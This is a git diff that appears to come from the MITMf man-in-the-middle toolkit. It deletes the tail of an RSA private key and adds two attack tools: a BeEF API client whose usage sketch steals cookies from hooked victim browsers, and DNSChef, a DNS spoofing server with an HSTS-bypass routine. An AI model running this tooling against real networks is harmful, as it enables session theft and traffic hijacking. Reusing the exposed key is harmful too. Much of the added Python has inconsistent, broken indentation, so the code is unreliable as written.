-+IJ6ystDpbD4fvFNdQyxH2SL9syFRyWyxY3vWB0C/OHWxGFtiTtmeivBSmpxl0RY
-RQqPLxX+xUCie7U6ud3e37FO7cKt+YT8lWKhGHKJlTlJbHs1d8crzp6qKJLl+ibB
-0fB6D6E5M1fnIJFJULIYAG5bEak90KuKOKCLoKLG+rq0vUvJsb9vNCAA6rh1ra+n
-8woY8TECgYEA7CEE/3oWnziB3PZoIIJDgbBalCCbA+/SgDiSvYJELEApCMj8HYc5
-UGOxrfVhPmbHRUI982Fj1oM3QBEX0zpkOk7Xk224RXwBHG8MMPQmTMVp+o06AI6D
-Nggyam9v5KLNMj5KghKJSOD0tR5YxsZPXw4gAI+wpqu3bXGKZ8bRpvUCgYEA1ICJ
-H+kw6H8edJHGdNH+X6RR0DIbS11XQvbKQ3vh6LdHTofoHqQa3t0zGYCgksKJbtHV
-2h3pv+nuOu5FEP2rrGJIforv2zwfJ5vp65jePrSXU+Up4pMHbP1Rm91ApcKNA15U
-q3SaclqTjmiqvaeSKc4TDjdb/rUaIhyIgbg97dUCgYAcdq5/jVwEvW8KD7nlkU5J
-59RDXtrQ0qvxQOCPb5CANQu9P10EwjQqeJoGejnKp+EFfEKzf93lEdQrKORSVguW
-68IYx3UbCyOnJcu2avfi8TkhNrzzLDqs3LgXFG/Mg8NwdwnMPCfIXTWiT5IsA+O1
-daJt7uRAcxqdWr5wXAsRsQKBgFXU4Q4hm16dUcjVxKoU08D/1wfX5UxolEF4+zOM
-yy+7L7MZk/kkYbIY+HXZjYIZz3cSjGVAZdTdgRsOeJknTPsg65UpOz57Jz5RbId7
-xHDhcqoxSty4dGxiWV8yW9VYIqr0pBBo1aVQzn7b6fMWxyPZl7rLQ3462iZjDgQP
-TfxNAoGBAK/Gef6MgchbFPikOVEX9qB/wt4sS3V7mT6QkqMZZgSkegDLBFVRJX3w
-Emx/V2A14p0uHPzn5irURyJ6daZCN4amPAWYQnkiXG8saiBwtfs23A1q7kxnPR+b
-KJfb+nDlhU1iYa/7nf4PaR/i9l6gcwOeh1ThK1nq4VvwTaTZKSRh
------END RSA PRIVATE KEY-----
diff --git a/core/beefapi b/core/beefapi
deleted file mode 160000
index 28d2fef..0000000
--- a/core/beefapi
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 28d2fef986e217425cb621701f267e40425330c4
diff --git a/core/beefapi.py b/core/beefapi.py
new file mode 100644
index 0000000..e8d2ec3
--- /dev/null
+++ b/core/beefapi.py
@@ -0,0 +1,171 @@
+#!/usr/bin/env python
+import requests
+import json
+import logging
+from random import sample
+from string import lowercase, digits
+
+logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message
+
+class BeefAPI:
+
+    def __init__(self, opts=None):
+        opts = opts or {}
+        # Fall back to BeEF's defaults; opts can override the host and port
+        self.host = opts.get("host", "127.0.0.1")
+        self.port = opts.get("port", "3000")
+ self.token = None
+ self.url = "http://%s:%s/api/" % (self.host, self.port)
+ self.login_url = self.url + "admin/login"
+ self.hookurl = self.url + "hooks?token="
+ self.mod_url = self.url + "modules?token="
+ self.log_url = self.url + "logs?token="
+
+ def random_url(self):
+ return "".join(sample(digits + lowercase, 8))
+
+ def login(self, username, password):
+ try:
+ auth = json.dumps({"username": username, "password": password})
+ r = requests.post(self.login_url, data=auth)
+ data = r.json()
+
+ if (r.status_code == 200) and (data["success"]):
+ self.token = data["token"] #Auth token
+ return True
+ elif r.status_code != 200:
+ return False
+
+ except Exception, e:
+ print "beefapi ERROR: %s" % e
+
+ def sessions_online(self):
+ return self.get_sessions("online", "session")
+
+ def sessions_offline(self):
+ return self.get_sessions("offline", "session")
+
+ def session2host(self, session):
+ return self.conversion(session, "ip")
+
+ def session2id(self, session):
+ return self.conversion(session, "id")
+
+ def hook_info(self, hook): #Returns parsed information on a session
+ session = self.conversion(hook, "session")
+ url = self.hookurl + self.token
+ r = requests.get(url).json()
+
+ try:
+ states = ["online", "offline"]
+ for state in states:
+ for v in r["hooked-browsers"][state].items():
+ if v[1]["session"] == session:
+ return v[1]
+ except IndexError:
+ pass
+
+ def hook_info_all(self, hook):
+ session = self.conversion(hook, "session")
+ url = self.url + "hooks/%s?token=%s" % (session, self.token)
+ return requests.get(url).json()
+
+ def hook_logs(self, hook):
+ session = self.conversion(hook, "session")
+ url = self.url + "logs/%s?token=%s" % (session, self.token)
+ return requests.get(url).json()
+
+ def hosts_online(self):
+ return self.get_sessions("online", "ip")
+
+ def hosts_offline(self):
+ return self.get_sessions("offline", "ip")
+
+ def host2session(self, host):
+ return self.conversion(host, "session")
+
+ def host2id(self, host):
+ return self.conversion(host, "id")
+
+ def ids_online(self):
+ return self.get_sessions("online", "id")
+
+ def ids_offline(self):
+ return self.get_sessions("offline", "id")
+
+ def id2session(self, id):
+ return self.conversion(id, "session")
+
+ def id2host(self, id):
+ return self.conversion(id, "ip")
+
+ def module_id(self, name): #Returns module id
+ url = self.mod_url + self.token
+ try:
+ r = requests.get(url).json()
+ for v in r.values():
+ if v["name"] == name:
+ return v["id"]
+ except Exception, e:
+ print "beefapi ERROR: %s" % e
+
+ def module_name(self, id): #Returns module name
+ url = self.mod_url + self.token
+ try:
+ r = requests.get(url).json()
+ for v in r.values():
+ if v["id"] == id:
+ return v["name"]
+ except Exception, e:
+ print "beefapi ERROR: %s" % e
+
+ def module_run(self, hook, mod_id, options={}): #Executes a module on a specified session
+ try:
+ session = self.conversion(hook, "session")
+ headers = {"Content-Type": "application/json", "charset": "UTF-8"}
+ payload = json.dumps(options)
+ url = self.url + "modules/%s/%s?token=%s" % (session, mod_id, self.token)
+ return requests.post(url, headers=headers, data=payload).json()
+ except Exception, e:
+ print "beefapi ERROR: %s" % e
+
+ def module_results(self, hook, mod_id, cmd_id):
+ session = self.conversion(hook, "session")
+ url = self.mod_url + "%s/%s/%s?token=%s" % (session, mod_id, cmd_id, self.token)
+ return requests.get(url).json()
+
+ def modules_list(self):
+ return requests.get(self.mod_url + self.token).json()
+
+ def module_info(self, id):
+ url = self.url + "modules/%s?token=%s" % (id, self.token)
+ return requests.get(url).json()
+
+ def logs(self):
+ return requests.get(self.log_url + self.token).json()
+
+ def conversion(self, value, return_value): #Helper function for all conversion functions
+ url = self.hookurl + self.token
+ try:
+ r = requests.get(url).json()
+ states = ["online", "offline"]
+ for state in states:
+ for v in r["hooked-browsers"][state].items():
+ for r in v[1].values():
+ if str(value) == str(r):
+ return v[1][return_value]
+
+        # handle the more specific exception first, otherwise the generic
+        # handler below would swallow it
+        except IndexError:
+            pass
+
+        except Exception, e:
+            print "beefapi ERROR: %s" % e
+
+ def get_sessions(self, state, value): #Helper function
+ try:
+ hooks = []
+ r = requests.get(self.hookurl + self.token).json()
+ for v in r["hooked-browsers"][state].items():
+ hooks.append(v[1][value])
+
+ return hooks
+ except Exception, e:
+ print "beefapi ERROR: %s" % e
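+
+
+if __name__ == "__main__":
+    # Minimal usage sketch (not part of the framework's own startup code): it
+    # assumes a local BeEF instance listening on the defaults above with the
+    # stock "beef"/"beef" credentials -- adjust these to your setup. The
+    # "Get Cookie" module name is only an example and may differ per BeEF version.
+    beef = BeefAPI({})
+
+    if beef.login("beef", "beef"):
+        for session in beef.sessions_online():
+            print "Hooked browser %s (id %s)" % (beef.session2host(session), beef.session2id(session))
+
+            # look up a module's id by name, then run it against the hooked browser
+            mod_id = beef.module_id("Get Cookie")
+            if mod_id:
+                print beef.module_run(session, mod_id)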
diff --git a/core/configwatcher.py b/core/configwatcher.py
new file mode 100644
index 0000000..2da6962
--- /dev/null
+++ b/core/configwatcher.py
@@ -0,0 +1,46 @@
+#! /usr/bin/env python2.7
+
+import logging
+from watchdog.observers import Observer
+from watchdog.events import FileSystemEventHandler
+from configobj import ConfigObj
+
+logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class ConfigWatcher(FileSystemEventHandler):
+
+ _instance = None
+ config = ConfigObj("./config/mitmf.conf")
+
+ @staticmethod
+ def getInstance():
+ if ConfigWatcher._instance is None:
+ ConfigWatcher._instance = ConfigWatcher()
+
+ return ConfigWatcher._instance
+
+ def startConfigWatch(self):
+ observer = Observer()
+ observer.schedule(self, path='./config', recursive=False)
+ observer.start()
+
+ def getConfig(self):
+ return self.config
+
+ def on_modified(self, event):
+ mitmf_logger.debug("[{}] Detected configuration changes, reloading!".format(self.__class__.__name__))
+ self.reloadConfig()
+ self.onConfigChange()
+
+ def onConfigChange(self):
+ """ We can subclass this function to do stuff after the config file has been modified"""
+ pass
+
+ def reloadConfig(self):
+ try:
+ self.config = ConfigObj("./config/mitmf.conf")
+ except Exception as e:
+            mitmf_logger.error("Error reloading config file: {}".format(e))
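+
+
+if __name__ == "__main__":
+    # Minimal usage sketch (illustrative only; assumes it is run from the MITMf
+    # root so that ./config/mitmf.conf and the ./config directory exist): a
+    # plugin would typically subclass ConfigWatcher and override onConfigChange()
+    # to react whenever mitmf.conf is edited on disk. The config section path
+    # below mirrors how DNSChef reads the [MITMf][DNS] settings.
+    import time
+
+    class ExampleWatcher(ConfigWatcher):
+
+        def onConfigChange(self):
+            # called by on_modified() after the config file has been re-read
+            print "DNS port is now {}".format(self.config['MITMf']['DNS']['port'])
+
+    watcher = ExampleWatcher()
+    watcher.startConfigWatch()
+
+    # keep the main thread alive so the watchdog observer thread can run
+    while True:
+        time.sleep(1)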
diff --git a/core/dnschef/CHANGELOG b/core/dnschef/CHANGELOG
new file mode 100644
index 0000000..727a7d7
--- /dev/null
+++ b/core/dnschef/CHANGELOG
@@ -0,0 +1,29 @@
+Version 0.3
+
+* Added support for the latest version of the dnslib library - 0.9.3
+* Added support for logging. (idea by kafeine)
+* Added support for SRV, DNSKEY, and RRSIG records. (idea by mubix)
+* Added support for TCP remote nameserver connections. (idea by mubix)
+* DNS name matching is now case insensitive.
+* Various small bug fixes and performance tweaks.
+* Python libraries are no longer bundled with the distribution, but
+ compiled in the Windows binary.
+
+Version 0.2.1
+
+* Fixed a Python 2.6 compatibility issue. (thanks Mehran Goudarzi)
+
+Version 0.2
+
+* Added IPv6 support.
+* Added AAAA, MX, CNAME, NS, SOA and NAPTR support.
+* Added support for ANY queries (returns all known fake records).
+* Changed file format to support more DNS record types.
+* Added alternative DNS port support (contributed by fnv).
+* Added alternative listening port support for the server (contributed by Mark Straver).
+* Updated bundled dnslib library to the latest version - 0.8.2.
+* Included IPy library for IPv6 support.
+
+Version 0.1
+
+* First public release
diff --git a/core/dnschef/DNSchef.py b/core/dnschef/DNSchef.py
new file mode 100755
index 0000000..69f3681
--- /dev/null
+++ b/core/dnschef/DNSchef.py
@@ -0,0 +1,508 @@
+#!/usr/bin/env python2.7
+#
+# DNSChef is a highly configurable DNS Proxy for Penetration Testers
+# and Malware Analysts. Please visit http://thesprawl.org/projects/dnschef/
+# for the latest version and documentation. Please forward all issues and
+# concerns to iphelix [at] thesprawl.org.
+
+# Copyright (C) 2015 Peter Kacherginsky, Marcello Salvati
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#
+# 1. Redistributions of source code must retain the above copyright notice, this
+# list of conditions and the following disclaimer.
+# 2. Redistributions in binary form must reproduce the above copyright notice,
+# this list of conditions and the following disclaimer in the documentation
+# and/or other materials provided with the distribution.
+# 3. Neither the name of the copyright holder nor the names of its contributors
+# may be used to endorse or promote products derived from this software without
+# specific prior written permission.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
+# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+import threading, random, operator, time
+import SocketServer, socket, sys, os
+import binascii
+import string
+import base64
+import logging
+
+from configobj import ConfigObj
+from core.configwatcher import ConfigWatcher
+from core.utils import shutdown
+
+from dnslib import *
+from IPy import IP
+
+formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
+dnschef_logger = logging.getLogger('dnschef')
+fileHandler = logging.FileHandler("./logs/dnschef/dnschef.log")
+fileHandler.setFormatter(formatter)
+dnschef_logger.addHandler(fileHandler)
+
+# DNSHandler Mixin. The class contains generic functions to parse DNS requests and
+# calculate an appropriate response based on user parameters.
+class DNSHandler():
+
+ def parse(self,data):
+
+ nametodns = DNSChef.getInstance().nametodns
+ nameservers = DNSChef.getInstance().nameservers
+ hsts = DNSChef.getInstance().hsts
+ hstsconfig = DNSChef.getInstance().real_records
+ server_address = DNSChef.getInstance().server_address
+
+ response = ""
+
+ try:
+ # Parse data as DNS
+ d = DNSRecord.parse(data)
+
+ except Exception, e:
+ dnschef_logger.info("{} [DNSChef] Error: invalid DNS request".format(self.client_address[0]))
+
+ else:
+ # Only Process DNS Queries
+ if QR[d.header.qr] == "QUERY":
+
+ # Gather query parameters
+ # NOTE: Do not lowercase qname here, because we want to see
+ # any case request weirdness in the logs.
+ qname = str(d.q.qname)
+
+ # Chop off the last period
+ if qname[-1] == '.': qname = qname[:-1]
+
+ qtype = QTYPE[d.q.qtype]
+
+ # Find all matching fake DNS records for the query name or get False
+ fake_records = dict()
+
+ for record in nametodns:
+
+ fake_records[record] = self.findnametodns(qname, nametodns[record])
+
+ if hsts:
+ if qname in hstsconfig:
+ response = self.hstsbypass(hstsconfig[qname], qname, nameservers, d)
+ return response
+
+ elif qname[:4] == 'wwww':
+ response = self.hstsbypass(qname[1:], qname, nameservers, d)
+ return response
+
+ elif qname[:3] == 'web':
+ response = self.hstsbypass(qname[3:], qname, nameservers, d)
+ return response
+
+ # Check if there is a fake record for the current request qtype
+ if qtype in fake_records and fake_records[qtype]:
+
+ fake_record = fake_records[qtype]
+
+ # Create a custom response to the query
+ response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
+
+ dnschef_logger.info("{} [DNSChef] Cooking the response of type '{}' for {} to {}".format(self.client_address[0], qtype, qname, fake_record))
+
+ # IPv6 needs additional work before inclusion:
+ if qtype == "AAAA":
+ ipv6 = IP(fake_record)
+ ipv6_bin = ipv6.strBin()
+ ipv6_hex_tuple = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)]
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](ipv6_hex_tuple)))
+
+ elif qtype == "SOA":
+ mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ")
+ times = tuple([int(t) for t in [t1,t2,t3,t4,t5]])
+
+ # dnslib doesn't like trailing dots
+ if mname[-1] == ".": mname = mname[:-1]
+ if rname[-1] == ".": rname = rname[:-1]
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times)))
+
+ elif qtype == "NAPTR":
+ order,preference,flags,service,regexp,replacement = fake_record.split(" ")
+ order = int(order)
+ preference = int(preference)
+
+ # dnslib doesn't like trailing dots
+ if replacement[-1] == ".": replacement = replacement[:-1]
+
+ response.add_answer( RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,DNSLabel(replacement))) )
+
+ elif qtype == "SRV":
+ priority, weight, port, target = fake_record.split(" ")
+ priority = int(priority)
+ weight = int(weight)
+ port = int(port)
+ if target[-1] == ".": target = target[:-1]
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) ))
+
+ elif qtype == "DNSKEY":
+ flags, protocol, algorithm, key = fake_record.split(" ")
+ flags = int(flags)
+ protocol = int(protocol)
+ algorithm = int(algorithm)
+ key = base64.b64decode(("".join(key)).encode('ascii'))
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) ))
+
+ elif qtype == "RRSIG":
+ covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
+ covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE
+ algorithm = int(algorithm)
+ labels = int(labels)
+ orig_ttl = int(orig_ttl)
+ sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z")))
+ sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z")))
+ key_tag = int(key_tag)
+ if name[-1] == '.': name = name[:-1]
+ sig = base64.b64decode(("".join(sig)).encode('ascii'))
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig)))
+
+ else:
+ # dnslib doesn't like trailing dots
+ if fake_record[-1] == ".": fake_record = fake_record[:-1]
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
+
+ response = response.pack()
+
+ elif qtype == "*" and not None in fake_records.values():
+ dnschef_logger.info("{} [DNSChef] Cooking the response of type '{}' for {} with {}".format(self.client_address[0], "ANY", qname, "all known fake records."))
+
+ response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q)
+
+ for qtype,fake_record in fake_records.items():
+ if fake_record:
+
+ # NOTE: RDMAP is a dictionary map of qtype strings to handling classes
+ # IPv6 needs additional work before inclusion:
+ if qtype == "AAAA":
+ ipv6 = IP(fake_record)
+ ipv6_bin = ipv6.strBin()
+ fake_record = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)]
+
+ elif qtype == "SOA":
+ mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ")
+ times = tuple([int(t) for t in [t1,t2,t3,t4,t5]])
+
+ # dnslib doesn't like trailing dots
+ if mname[-1] == ".": mname = mname[:-1]
+ if rname[-1] == ".": rname = rname[:-1]
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times)))
+
+ elif qtype == "NAPTR":
+ order,preference,flags,service,regexp,replacement = fake_record.split(" ")
+ order = int(order)
+ preference = int(preference)
+
+ # dnslib doesn't like trailing dots
+ if replacement and replacement[-1] == ".": replacement = replacement[:-1]
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,replacement)))
+
+ elif qtype == "SRV":
+ priority, weight, port, target = fake_record.split(" ")
+ priority = int(priority)
+ weight = int(weight)
+ port = int(port)
+ if target[-1] == ".": target = target[:-1]
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) ))
+
+ elif qtype == "DNSKEY":
+ flags, protocol, algorithm, key = fake_record.split(" ")
+ flags = int(flags)
+ protocol = int(protocol)
+ algorithm = int(algorithm)
+ key = base64.b64decode(("".join(key)).encode('ascii'))
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) ))
+
+ elif qtype == "RRSIG":
+ covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
+ covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE
+ algorithm = int(algorithm)
+ labels = int(labels)
+ orig_ttl = int(orig_ttl)
+ sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z")))
+ sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z")))
+ key_tag = int(key_tag)
+ if name[-1] == '.': name = name[:-1]
+ sig = base64.b64decode(("".join(sig)).encode('ascii'))
+
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig) ))
+
+ else:
+ # dnslib doesn't like trailing dots
+ if fake_record[-1] == ".": fake_record = fake_record[:-1]
+ response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
+
+ response = response.pack()
+
+ # Proxy the request
+ else:
+ dnschef_logger.debug("{} [DNSChef] Proxying the response of type '{}' for {}".format(self.client_address[0], qtype, qname))
+
+ nameserver_tuple = random.choice(nameservers).split('#')
+ response = self.proxyrequest(data, *nameserver_tuple)
+
+ return response
+
+
+ # Find the appropriate IP address to use for a queried name. The function
+ # handles wildcard entries and returns False when no fake record matches.
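+ #
+ # Worked example (illustrative): for the query 'mail.thesprawl.org' and the
+ # configured entry '*.thesprawl.org', both names are split and reversed into
+ # ['org', 'thesprawl', 'mail'] and ['org', 'thesprawl', '*']. No pair hits a
+ # mismatching non-wildcard label, so the loop's else clause fires and the
+ # configured host is returned; if no entry matches, the function returns False.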
+ def findnametodns(self,qname,nametodns):
+
+ # Make qname case insensitive
+ qname = qname.lower()
+
+ # Split and reverse qname into components for matching.
+ qnamelist = qname.split('.')
+ qnamelist.reverse()
+
+ # HACK: It is important to search the nametodns dictionary before iterating it so that
+ # global matching ['*.*.*.*.*.*.*.*.*.*'] will match last. Use sorting for that.
+ for domain,host in sorted(nametodns.iteritems(), key=operator.itemgetter(1)):
+
+ # NOTE: It is assumed that domain name was already lowercased
+ # when it was loaded through --file, --fakedomains or --truedomains
+ # don't want to waste time lowercasing domains on every request.
+
+ # Split and reverse domain into components for matching
+ domain = domain.split('.')
+ domain.reverse()
+
+ # Compare domains in reverse.
+ for a,b in map(None,qnamelist,domain):
+ if a != b and b != "*":
+ break
+ else:
+ # Could be a real IP or False if we are doing reverse matching with 'truedomains'
+ return host
+ else:
+ return False
+
+ # Obtain a response from a real DNS server.
+ def proxyrequest(self, request, host, port="53", protocol="udp"):
+ reply = None
+ try:
+ if DNSChef.getInstance().ipv6:
+
+ if protocol == "udp":
+ sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
+ elif protocol == "tcp":
+ sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
+
+ else:
+ if protocol == "udp":
+ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+ elif protocol == "tcp":
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+ sock.settimeout(3.0)
+
+ # Send the proxy request to a randomly chosen DNS server
+
+ if protocol == "udp":
+ sock.sendto(request, (host, int(port)))
+ reply = sock.recv(1024)
+ sock.close()
+
+ elif protocol == "tcp":
+ sock.connect((host, int(port)))
+
+ # Add length for the TCP request
+ length = binascii.unhexlify("%04x" % len(request))
+ sock.sendall(length+request)
+
+ # Strip length from the response
+ reply = sock.recv(1024)
+ reply = reply[2:]
+
+ sock.close()
+
+ except Exception, e:
+ dnschef_logger.warning("[DNSChef] Could not proxy request: {}".format(e))
+ else:
+ return reply
+
+ def hstsbypass(self, real_domain, fake_domain, nameservers, d):
+
+ dnschef_logger.info("{} [DNSChef] Resolving '{}' to '{}' for HSTS bypass".format(self.client_address[0], fake_domain, real_domain))
+
+ response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
+
+ nameserver_tuple = random.choice(nameservers).split('#')
+
+ #First proxy the request with the real domain
+ q = DNSRecord.question(real_domain).pack()
+ r = self.proxyrequest(q, *nameserver_tuple)
+
+ #Parse the answer
+ dns_rr = DNSRecord.parse(r).rr
+
+ #Create the DNS response
+ for res in dns_rr:
+ if res.get_rname() == real_domain:
+ res.set_rname(fake_domain)
+ response.add_answer(res)
+ else:
+ response.add_answer(res)
+
+ return response.pack()
+
+# UDP DNS Handler for incoming requests
+class UDPHandler(DNSHandler, SocketServer.BaseRequestHandler):
+
+ def handle(self):
+ (data,socket) = self.request
+ response = self.parse(data)
+
+ if response:
+ socket.sendto(response, self.client_address)
+
+# TCP DNS Handler for incoming requests
+class TCPHandler(DNSHandler, SocketServer.BaseRequestHandler):
+
+ def handle(self):
+ data = self.request.recv(1024)
+
+ # Remove the additional "length" parameter used in the
+ # TCP DNS protocol
+ data = data[2:]
+ response = self.parse(data)
+
+ if response:
+ # Calculate and add the additional "length" parameter
+ # used in TCP DNS protocol
+ length = binascii.unhexlify("%04x" % len(response))
+ self.request.sendall(length+response)
+
+class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
+
+ # Override SocketServer.UDPServer to add extra parameters
+ def __init__(self, server_address, RequestHandlerClass):
+ self.address_family = socket.AF_INET6 if DNSChef.getInstance().ipv6 else socket.AF_INET
+
+ SocketServer.UDPServer.__init__(self,server_address,RequestHandlerClass)
+
+class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
+
+ # Override default value
+ allow_reuse_address = True
+
+ # Override SocketServer.TCPServer to add extra parameters
+ def __init__(self, server_address, RequestHandlerClass):
+ self.address_family = socket.AF_INET6 if DNSChef.getInstance().ipv6 else socket.AF_INET
+
+ SocketServer.TCPServer.__init__(self,server_address,RequestHandlerClass)
+
+class DNSChef(ConfigWatcher):
+
+ _instance = None
+ version = "0.4"
+
+ tcp = False
+ ipv6 = False
+ hsts = False
+ real_records = dict()
+ nametodns = dict()
+ server_address = "0.0.0.0"
+ nameservers = ["8.8.8.8"]
+ port = 53
+
+ @staticmethod
+ def getInstance():
+ if DNSChef._instance == None:
+ DNSChef._instance = DNSChef()
+
+ return DNSChef._instance
+
+ def onConfigChange(self):
+ config = self.config['MITMf']['DNS']
+
+ self.port = int(config['port'])
+
+ # Main storage of domain filters
+ # NOTE: RDMAP is a dictionary map of qtype strings to handling classes
+ for qtype in RDMAP.keys():
+ self.nametodns[qtype] = dict()
+
+ # Adjust defaults for IPv6
+ if config['ipv6'].lower() == 'on':
+ self.ipv6 = True
+ if config['nameservers'] == "8.8.8.8":
+ self.nameservers = "2001:4860:4860::8888"
+
+ # Use alternative DNS servers
+ if config['nameservers']:
+ self.nameservers = config['nameservers'].split(',')
+
+ for section in config.sections:
+
+ if section in self.nametodns:
+ for domain,record in config[section].iteritems():
+
+ # Make domain case insensitive
+ domain = domain.lower()
+
+ self.nametodns[section][domain] = record
+
+ for k,v in self.config["SSLstrip+"].iteritems():
+ self.real_records[v] = k
+
+ def setHstsBypass(self):
+ self.hsts = True
+
+ def start(self):
+ self.onConfigChange()
+ self.startConfigWatch()
+
+ try:
+ if self.config['MITMf']['DNS']['tcp'].lower() == 'on':
+ self.startTCP()
+ else:
+ self.startUDP()
+ except socket.error as e:
+            if "Address already in use" in str(e):
+ shutdown("\n[DNSChef] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port']))
+
+ # Initialize and start the DNS Server
+ def startUDP(self):
+ server = ThreadedUDPServer((self.server_address, int(self.port)), UDPHandler)
+ # Start a thread with the server -- that thread will then start
+ # more threads for each request
+ server_thread = threading.Thread(target=server.serve_forever)
+
+ # Exit the server thread when the main thread terminates
+ server_thread.daemon = True
+ server_thread.start()
+
+ # Initialize and start the DNS Server
+ def startTCP(self):
+ server = ThreadedTCPServer((self.server_address, int(self.port)), TCPHandler)
+
+ # Start a thread with the server -- that thread will then start
+ # more threads for each request
+ server_thread = threading.Thread(target=server.serve_forever)
+
+ # Exit the server thread when the main thread terminates
+ server_thread.daemon = True
+ server_thread.start()
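+
+# Minimal usage sketch (illustrative only -- in MITMf the framework itself is
+# responsible for wiring this up): a plugin running from the MITMf root would
+# grab the singleton, optionally enable the HSTS-bypass records and start the
+# server, which then reads the [MITMf][DNS] section of config/mitmf.conf.
+#
+#   from core.dnschef.DNSchef import DNSChef
+#
+#   dns = DNSChef.getInstance()   # singleton shared by the whole framework
+#   dns.setHstsBypass()           # also serve the fake domains from [SSLstrip+]
+#   dns.start()                   # spawns the UDP or TCP server in a daemon thread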
diff --git a/core/dnschef/LICENSE b/core/dnschef/LICENSE
new file mode 100644
index 0000000..b826757
--- /dev/null
+++ b/core/dnschef/LICENSE
@@ -0,0 +1,25 @@
+Copyright (C) 2014 Peter Kacherginsky
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+ list of conditions and the following disclaimer.
+2. Redistributions in binary form must reproduce the above copyright notice,
+ this list of conditions and the following disclaimer in the documentation
+ and/or other materials provided with the distribution.
+3. Neither the name of the copyright holder nor the names of its contributors
+ may be used to endorse or promote products derived from this software without
+ specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
+ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
